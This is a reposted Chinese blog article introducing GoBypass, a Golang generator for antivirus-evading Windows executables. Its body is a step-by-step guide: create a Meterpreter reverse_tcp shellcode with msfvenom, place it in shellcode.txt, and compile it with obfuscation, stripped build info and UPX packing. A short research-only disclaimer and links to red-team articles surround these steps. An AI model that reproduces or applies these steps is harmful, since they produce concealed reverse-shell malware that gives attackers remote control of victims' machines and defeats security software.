GoBypass - Golang免杀生成工具
2022-10-8 08:9:15 Author: 系统安全运维(查看原文) 阅读量:32 收藏

Golang免杀生成工具,参考网上已有的免杀方式实现的半自动免杀马生成工具,需要本地安装Golang环境,支持多种参数与方式生成。
项目地址:
https://github.com/4ra1n/GoBypass
0x01 免责声明
该工具仅用于安全研究,禁止使用工具发起非法攻击等违法行为,造成的后果使用者负责。
0x02 介绍
Golang免杀马生成工具(该工具仅针对Windows系统),不确定免杀效果如何,核心部分借鉴大佬的代码然后自己造轮子。
使用参考视频:
https://www.bilibili.com/video/BV1iu411d7QB
0x03 准备工作
在kali中使用msfvenom生成需要的payload(注意使用-f c参数),示例:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f c
复制完整C语言格式的shellcode并写入当前目录的shellcode.txt(无需过多处理,内部会对ShellCode进行编码)
0x04 生成免杀马
在生成免杀马之前请注意以下三件事:
确保安装Golang且环境变量中包含go,否则无法编译请在当前目录先执行go env -w GO111MODULE=on,然后go mod download命令下载依赖如果下载依赖过慢,配置镜像go env -w GOPROXY=https://mirrors.aliyun.com/goproxy
一切就绪后就可以开始生成了,示例:
使用CreateThread模块并删除编译信息:go run main.go -m CreateThread -d
删除编译信息且用garble混淆源码后编译:go run main.go -m CreateThread -d -g
编译后的可执行文件进行upx加壳:go run main.go -m CreateThread -d -g -u
可选参数如下:
其中必须的模块参数如下:
0x05 参考
尤其感谢Safe6Sec师傅的项目
  • https://github.com/safe6Sec/GolangBypassAV
  • https://github.com/Ne0nd0g/go-shellcod

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247510840&idx=1&sn=fcaaca2c10927acdac436de42cc21b50&chksm=c3087848f47ff15e32e6a0eff6c2f91f0f5c859caddd6477a44c2df9b6dea45f936f82152721#rd
如有侵权请联系:admin#unsafe.sh